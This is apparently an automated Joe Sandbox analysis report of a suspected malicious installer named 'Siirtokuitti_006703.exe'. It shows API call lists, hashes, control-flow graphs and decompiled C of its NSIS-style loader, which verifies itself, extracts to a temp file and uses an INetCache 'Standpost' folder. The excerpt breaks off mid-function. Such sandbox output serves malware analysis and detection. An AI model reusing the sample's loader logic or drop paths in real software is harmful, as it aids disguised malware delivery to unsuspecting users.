                                                                                                                      0x00403b78
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403b86
                                                                                                                      0x00403b98
                                                                                                                      0x00403b9d
                                                                                                                      0x00403ba6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403bac
                                                                                                                      0x00403bae
                                                                                                                      0x00403bbb
                                                                                                                      0x00403bbb
                                                                                                                      0x00403bc4
                                                                                                                      0x00403bca
                                                                                                                      0x00403bf2
                                                                                                                      0x00403bfa
                                                                                                                      0x00000000
                                                                                                                      0x00403bdc
                                                                                                                      0x00403bdd
                                                                                                                      0x00403be6
                                                                                                                      0x00403bec
                                                                                                                      0x00403bed
                                                                                                                      0x00000000
                                                                                                                      0x00403bed
                                                                                                                      0x00403be8
                                                                                                                      0x00403bea
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403bea
                                                                                                                      0x00403bca

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                      • lstrcatW.KERNEL32(1033,00423728), ref: 00403B3F
                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost), ref: 00403C26
                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                      • API String ID: 1975747703-3039151688
                                                                                                                      • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                      • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                                                                      • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                      • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 440 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 443 402f64-402f69 440->443 444 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 440->444 445 4031b3-4031b7 443->445 452 402fa2-402fb9 444->452 453 40308c-40309a call 402e72 444->453 455 402fbb 452->455 456 402fbd-402fca call 40342b 452->456 459 4030a0-4030a3 453->459 460 40316b-403170 453->460 455->456 464 402fd0-402fd6 456->464 465 403127-40312f call 402e72 456->465 462 4030a5-4030bd call 403441 call 40342b 459->462 463 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 459->463 460->445 462->460 492 4030c3-4030c9 462->492 489 403131-403161 call 403441 call 4031ba 463->489 490 40311d-403122 463->490 469 403056-40305a 464->469 470 402fd8-402ff0 call 405e5d 464->470 465->460 473 403063-403069 469->473 474 40305c-403062 call 402e72 469->474 470->473 485 402ff2-402ff9 470->485 481 40306b-403079 call 40687d 473->481 482 40307c-403086 473->482 474->473 481->482 482->452 482->453 485->473 491 402ffb-403002 485->491 500 403166-403169 489->500 490->445 491->473 493 403004-40300b 491->493 492->460 492->463 493->473 495 40300d-403014 493->495 495->473 497 403016-403036 495->497 497->460 499 40303c-403040 497->499 501 403042-403046 499->501 502 403048-403050 499->502 500->460 503 403172-403183 500->503 501->453 501->502 502->473 504 403052-403054 502->504 505 403185 503->505 506 40318b-403190 503->506 504->473 505->506 507 403191-403197 506->507 507->507 508 403199-4031b1 call 405e5d 507->508 508->445
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00402F14(void* __eflags, signed int _a4) {
                                                                                                                      				long _v8;
                                                                                                                      				long _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				long _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				intOrPtr _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				short _v560;
                                                                                                                      				signed int _t54;
                                                                                                                      				void* _t57;
                                                                                                                      				void* _t62;
                                                                                                                      				intOrPtr _t65;
                                                                                                                      				void* _t68;
                                                                                                                      				intOrPtr* _t70;
                                                                                                                      				intOrPtr _t71;
                                                                                                                      				signed int _t77;
                                                                                                                      				signed int _t82;
                                                                                                                      				signed int _t83;
                                                                                                                      				signed int _t89;
                                                                                                                      				intOrPtr _t92;
                                                                                                                      				signed int _t101;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t105;
                                                                                                                      				signed int _t106;
                                                                                                                      				signed int _t109;
                                                                                                                      				void* _t110;
                                                                                                                      
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				 *0x42a250 = GetTickCount() + 0x3e8;
                                                                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe", 0x400);
                                                                                                                      				_t105 = E00405EA2(L"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe", 0x80000000, 3);
                                                                                                                      				 *0x40a018 = _t105;
                                                                                                                      				if(_t105 == 0xffffffff) {
                                                                                                                      					return L"Error launching installer";
                                                                                                                      				}
                                                                                                                      				E004063B0(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe");
                                                                                                                      				E004063B0(0x439000, E00405CCD(L"C:\\Users\\Arthur\\Desktop"));
                                                                                                                      				_t54 = GetFileSize(_t105, 0);
                                                                                                                      				__eflags = _t54;
                                                                                                                      				 *0x418ee0 = _t54;
                                                                                                                      				_t109 = _t54;
                                                                                                                      				if(_t54 <= 0) {
                                                                                                                      					L22:
                                                                                                                      					E00402E72("true");
                                                                                                                      					__eflags =  *0x42a258;
                                                                                                                      					if( *0x42a258 == 0) {
                                                                                                                      						goto L30;
                                                                                                                      					}
                                                                                                                      					__eflags = _v12;
                                                                                                                      					if(_v12 == 0) {
                                                                                                                      						L26:
                                                                                                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                      						_t110 = _t57;
                                                                                                                      						E004068EB(0x40ce48);
                                                                                                                      						E00405ED1(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                                                                      						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                      						__eflags = _t62 - 0xffffffff;
                                                                                                                      						 *0x40a01c = _t62;
                                                                                                                      						if(_t62 != 0xffffffff) {
                                                                                                                      							_t65 = E00403441( *0x42a258 + 0x1c);
                                                                                                                      							 *0x418ee4 = _t65;
                                                                                                                      							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                      							_t68 = E004031BA(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                      							__eflags = _t68 - _v20;
                                                                                                                      							if(_t68 == _v20) {
                                                                                                                      								__eflags = _v40 & 0x00000001;
                                                                                                                      								 *0x42a254 = _t110;
                                                                                                                      								 *0x42a25c =  *_t110;
                                                                                                                      								if((_v40 & 0x00000001) != 0) {
                                                                                                                      									 *0x42a260 =  *0x42a260 + 1;
                                                                                                                      									__eflags =  *0x42a260;
                                                                                                                      								}
                                                                                                                      								_t45 = _t110 + 0x44; // 0x44
                                                                                                                      								_t70 = _t45;
                                                                                                                      								_t101 = 8;
                                                                                                                      								do {
                                                                                                                      									_t70 = _t70 - 8;
                                                                                                                      									 *_t70 =  *_t70 + _t110;
                                                                                                                      									_t101 = _t101 - 1;
                                                                                                                      									__eflags = _t101;
                                                                                                                      								} while (_t101 != 0);
                                                                                                                      								_t71 =  *0x418ed4; // 0x3efe
                                                                                                                      								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                                                                      								E00405E5D(0x42a280, _t110 + 4, 0x40);
                                                                                                                      								__eflags = 0;
                                                                                                                      								return 0;
                                                                                                                      							}
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                      					}
                                                                                                                      					E00403441( *0x418ed0);
                                                                                                                      					_t77 = E0040342B( &_a4, 4);
                                                                                                                      					__eflags = _t77;
                                                                                                                      					if(_t77 == 0) {
                                                                                                                      						goto L30;
                                                                                                                      					}
                                                                                                                      					__eflags = _v8 - _a4;
                                                                                                                      					if(_v8 != _a4) {
                                                                                                                      						goto L30;
                                                                                                                      					}
                                                                                                                      					goto L26;
                                                                                                                      				} else {
                                                                                                                      					do {
                                                                                                                      						_t106 = _t109;
                                                                                                                      						asm("sbb eax, eax");
                                                                                                                      						_t82 = ( ~( *0x42a258) & 0x00007e00) + 0x200;
                                                                                                                      						__eflags = _t109 - _t82;
                                                                                                                      						if(_t109 >= _t82) {
                                                                                                                      							_t106 = _t82;
                                                                                                                      						}
                                                                                                                      						_t83 = E0040342B(0x418ee8, _t106);
                                                                                                                      						__eflags = _t83;
                                                                                                                      						if(_t83 == 0) {
                                                                                                                      							E00402E72("true");
                                                                                                                      							L30:
                                                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                      						}
                                                                                                                      						__eflags =  *0x42a258;
                                                                                                                      						if( *0x42a258 != 0) {
                                                                                                                      							__eflags = _a4 & 0x00000002;
                                                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                                                      								E00402E72(0);
                                                                                                                      							}
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						E00405E5D( &_v40, 0x418ee8, 0x1c);
                                                                                                                      						_t89 = _v40;
                                                                                                                      						__eflags = _t89 & 0xfffffff0;
                                                                                                                      						if((_t89 & 0xfffffff0) != 0) {
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						__eflags = _v36 - 0xdeadbeef;
                                                                                                                      						if(_v36 != 0xdeadbeef) {
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						__eflags = _v24 - 0x74736e49;
                                                                                                                      						if(_v24 != 0x74736e49) {
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						__eflags = _v28 - 0x74666f73;
                                                                                                                      						if(_v28 != 0x74666f73) {
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						__eflags = _v32 - 0x6c6c754e;
                                                                                                                      						if(_v32 != 0x6c6c754e) {
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						_a4 = _a4 | _t89;
                                                                                                                      						_t103 =  *0x418ed0; // 0x0
                                                                                                                      						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                                                      						_t92 = _v16;
                                                                                                                      						__eflags = _t92 - _t109;
                                                                                                                      						 *0x42a258 = _t103;
                                                                                                                      						if(_t92 > _t109) {
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                                                      							L15:
                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                      							_t109 = _t92 - 4;
                                                                                                                      							__eflags = _t106 - _t109;
                                                                                                                      							if(_t106 > _t109) {
                                                                                                                      								_t106 = _t109;
                                                                                                                      							}
                                                                                                                      							goto L19;
                                                                                                                      						}
                                                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                                                      							goto L22;
                                                                                                                      						}
                                                                                                                      						goto L15;
                                                                                                                      						L19:
                                                                                                                      						__eflags = _t109 -  *0x418ee0; // 0x325f
                                                                                                                      						if(__eflags < 0) {
                                                                                                                      							_v8 = E0040687D(_v8, 0x418ee8, _t106);
                                                                                                                      						}
                                                                                                                      						 *0x418ed0 =  *0x418ed0 + _t106;
                                                                                                                      						_t109 = _t109 - _t106;
                                                                                                                      						__eflags = _t109;
                                                                                                                      					} while (_t109 > 0);
                                                                                                                      					goto L22;
                                                                                                                      				}
                                                                                                                      			}































                                                                                                                      0x00402f22
                                                                                                                      0x00402f25
                                                                                                                      0x00402f3f
                                                                                                                      0x00402f44
                                                                                                                      0x00402f57
                                                                                                                      0x00402f5c
                                                                                                                      0x00402f62
                                                                                                                      0x00000000
                                                                                                                      0x00402f64
                                                                                                                      0x00402f75
                                                                                                                      0x00402f86
                                                                                                                      0x00402f8d
                                                                                                                      0x00402f93
                                                                                                                      0x00402f95
                                                                                                                      0x00402f9a
                                                                                                                      0x00402f9c
                                                                                                                      0x0040308c
                                                                                                                      0x0040308e
                                                                                                                      0x00403093
                                                                                                                      0x0040309a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004030a0
                                                                                                                      0x004030a3
                                                                                                                      0x004030cf
                                                                                                                      0x004030d4
                                                                                                                      0x004030df
                                                                                                                      0x004030e1
                                                                                                                      0x004030f2
                                                                                                                      0x0040310d
                                                                                                                      0x00403113
                                                                                                                      0x00403116
                                                                                                                      0x0040311b
                                                                                                                      0x0040313a
                                                                                                                      0x0040314a
                                                                                                                      0x0040315c
                                                                                                                      0x00403161
                                                                                                                      0x00403166
                                                                                                                      0x00403169
                                                                                                                      0x00403172
                                                                                                                      0x00403176
                                                                                                                      0x0040317e
                                                                                                                      0x00403183
                                                                                                                      0x00403185
                                                                                                                      0x00403185
                                                                                                                      0x00403185
                                                                                                                      0x0040318d
                                                                                                                      0x0040318d
                                                                                                                      0x00403190
                                                                                                                      0x00403191
                                                                                                                      0x00403191
                                                                                                                      0x00403194
                                                                                                                      0x00403196
                                                                                                                      0x00403196
                                                                                                                      0x00403196
                                                                                                                      0x00403199
                                                                                                                      0x004031a0
                                                                                                                      0x004031ac
                                                                                                                      0x004031b1
                                                                                                                      0x00000000
                                                                                                                      0x004031b1
                                                                                                                      0x00000000
                                                                                                                      0x00403169
                                                                                                                      0x00000000
                                                                                                                      0x0040311d
                                                                                                                      0x004030ab
                                                                                                                      0x004030b6
                                                                                                                      0x004030bb
                                                                                                                      0x004030bd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004030c6
                                                                                                                      0x004030c9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402fa2
                                                                                                                      0x00402fa2
                                                                                                                      0x00402fa7
                                                                                                                      0x00402fab
                                                                                                                      0x00402fb2
                                                                                                                      0x00402fb7
                                                                                                                      0x00402fb9
                                                                                                                      0x00402fbb
                                                                                                                      0x00402fbb
                                                                                                                      0x00402fc3
                                                                                                                      0x00402fc8
                                                                                                                      0x00402fca
                                                                                                                      0x00403129
                                                                                                                      0x0040316b
                                                                                                                      0x00000000
                                                                                                                      0x0040316b
                                                                                                                      0x00402fd0
                                                                                                                      0x00402fd6
                                                                                                                      0x00403056
                                                                                                                      0x0040305a
                                                                                                                      0x0040305d
                                                                                                                      0x00403062
                                                                                                                      0x00000000
                                                                                                                      0x0040305a
                                                                                                                      0x00402fe3
                                                                                                                      0x00402fe8
                                                                                                                      0x00402feb
                                                                                                                      0x00402ff0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402ff2
                                                                                                                      0x00402ff9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402ffb
                                                                                                                      0x00403002
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403004
                                                                                                                      0x0040300b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040300d
                                                                                                                      0x00403014
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403016
                                                                                                                      0x0040301c
                                                                                                                      0x00403025
                                                                                                                      0x0040302b
                                                                                                                      0x0040302e
                                                                                                                      0x00403030
                                                                                                                      0x00403036
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040303c
                                                                                                                      0x00403040
                                                                                                                      0x00403048
                                                                                                                      0x00403048
                                                                                                                      0x0040304b
                                                                                                                      0x0040304e
                                                                                                                      0x00403050
                                                                                                                      0x00403052
                                                                                                                      0x00403052
                                                                                                                      0x00000000
                                                                                                                      0x00403050
                                                                                                                      0x00403042
                                                                                                                      0x00403046
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403063
                                                                                                                      0x00403063
                                                                                                                      0x00403069
                                                                                                                      0x00403079
                                                                                                                      0x00403079
                                                                                                                      0x0040307c
                                                                                                                      0x00403082
                                                                                                                      0x00403084
                                                                                                                      0x00403084
                                                                                                                      0x00000000
                                                                                                                      0x00402fa2

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F28
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Siirtokuitti_006703.exe,00000400), ref: 00402F44
                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00405EA6
                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Siirtokuitti_006703.exe,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00402F8D
                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Siirtokuitti_006703.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                      • API String ID: 2803837635-2647369149
                                                                                                                      • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                      • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                                                                      • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                      • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 575 4063d2-4063dd 576 4063f0-406406 575->576 577 4063df-4063ee 575->577 578 40640c-406419 576->578 579 40661e-406624 576->579 577->576 578->579 580 40641f-406426 578->580 581 40662a-406635 579->581 582 40642b-406438 579->582 580->579 584 406640-406641 581->584 585 406637-40663b call 4063b0 581->585 582->581 583 40643e-40644a 582->583 587 406450-40648e 583->587 588 40660b 583->588 585->584 589 406494-40649f 587->589 590 4065ae-4065b2 587->590 591 406619-40661c 588->591 592 40660d-406617 588->592 593 4064a1-4064a6 589->593 594 4064b8 589->594 595 4065b4-4065ba 590->595 596 4065e5-4065e9 590->596 591->579 592->579 593->594 600 4064a8-4064ab 593->600 597 4064bf-4064c6 594->597 601 4065ca-4065d6 call 4063b0 595->601 602 4065bc-4065c8 call 4062f7 595->602 598 4065f8-406609 lstrlenW 596->598 599 4065eb-4065f3 call 4063d2 596->599 604 4064c8-4064ca 597->604 605 4064cb-4064cd 597->605 598->579 599->598 600->594 608 4064ad-4064b0 600->608 612 4065db-4065e1 601->612 602->612 604->605 610 406508-40650b 605->610 611 4064cf-4064ed call 40627e 605->611 608->594 613 4064b2-4064b6 608->613 616 40651b-40651e 610->616 617 40650d-406519 GetSystemDirectoryW 610->617 618 4064f2-4064f6 611->618 612->598 615 4065e3 612->615 613->597 619 4065a6-4065ac call 406644 615->619 621 406520-40652e GetWindowsDirectoryW 616->621 622 406589-40658b 616->622 620 40658d-406591 617->620 623 406596-406599 618->623 624 4064fc-406503 call 4063d2 618->624 619->598 620->619 626 406593 620->626 621->622 622->620 625 406530-40653a 622->625 623->619 629 40659b-4065a1 lstrcatW 623->629 624->620 631 406554-40656a SHGetSpecialFolderLocation 625->631 632 40653c-40653f 625->632 626->623 629->619 633 406585 631->633 634 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 631->634 632->631 636 406541-406548 632->636 633->622 634->620 634->633 637 406550-406552 636->637 637->620 637->631
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E004063D2(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				struct _ITEMIDLIST* _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _t43;
                                                                                                                      				WCHAR* _t44;
                                                                                                                      				signed char _t46;
                                                                                                                      				signed int _t47;
                                                                                                                      				signed int _t48;
                                                                                                                      				short _t58;
                                                                                                                      				short _t60;
                                                                                                                      				short _t62;
                                                                                                                      				void* _t70;
                                                                                                                      				signed int _t76;
                                                                                                                      				void* _t82;
                                                                                                                      				signed char _t83;
                                                                                                                      				short _t86;
                                                                                                                      				signed int _t96;
                                                                                                                      				void* _t102;
                                                                                                                      				short _t103;
                                                                                                                      				signed int _t106;
                                                                                                                      				signed int _t108;
                                                                                                                      				void* _t109;
                                                                                                                      				WCHAR* _t110;
                                                                                                                      				void* _t112;
                                                                                                                      
                                                                                                                      				_t109 = __esi;
                                                                                                                      				_t102 = __edi;
                                                                                                                      				_t70 = __ebx;
                                                                                                                      				_t43 = _a8;
                                                                                                                      				if(_t43 < 0) {
                                                                                                                      					_t43 =  *( *0x42921c - 4 + _t43 * 4);
                                                                                                                      				}
                                                                                                                      				_push(_t70);
                                                                                                                      				_push(_t109);
                                                                                                                      				_push(_t102);
                                                                                                                      				_t96 =  *0x42a298 + _t43 * 2;
                                                                                                                      				_t44 = 0x4281e0;
                                                                                                                      				_t110 = 0x4281e0;
                                                                                                                      				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
                                                                                                                      					_t110 = _a4;
                                                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                                                      				}
                                                                                                                      				while(1) {
                                                                                                                      					_t103 =  *_t96;
                                                                                                                      					if(_t103 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                                                                      					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t82 = 2;
                                                                                                                      					_t96 = _t96 + _t82;
                                                                                                                      					__eflags = _t103 - 4;
                                                                                                                      					_a8 = _t96;
                                                                                                                      					if(__eflags >= 0) {
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							 *_t110 = _t103;
                                                                                                                      							_t110 = _t110 + _t82;
                                                                                                                      							__eflags = _t110;
                                                                                                                      						} else {
                                                                                                                      							 *_t110 =  *_t96;
                                                                                                                      							_t110 = _t110 + _t82;
                                                                                                                      							_t96 = _t96 + _t82;
                                                                                                                      						}
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                                                                      					_t46 =  *_t96;
                                                                                                                      					_t47 = _t46 & 0x000000ff;
                                                                                                                      					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                                                                      					_a8 = _a8 + 2;
                                                                                                                      					_v28 = _t47 | 0x00008000;
                                                                                                                      					_v24 = _t47;
                                                                                                                      					_t76 = _t83 & 0x000000ff;
                                                                                                                      					_v16 = _t76;
                                                                                                                      					__eflags = _t103 - 2;
